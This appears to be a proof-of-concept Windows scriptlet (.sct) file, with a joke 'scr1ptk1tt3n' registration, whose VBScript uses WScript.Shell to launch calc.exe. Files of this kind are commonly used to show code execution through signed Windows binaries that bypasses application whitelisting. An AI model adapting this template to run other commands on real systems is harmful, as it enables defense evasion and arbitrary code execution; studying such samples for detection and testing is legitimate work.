<?XML version="1.0"?>
<scriptlet>

<registration
    description="scr1ptk1tt3n"
    progid="scr1ptk1tt3n"
    version="1.33.7"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
	>
</registration>

<script language="VBScript">
<![CDATA[
		Dim objShell
		Set objShell = CreateObject("WScript.Shell")
		objShell.Run "calc.exe"
		Set objShell = Nothing
]]>
</script>

</scriptlet>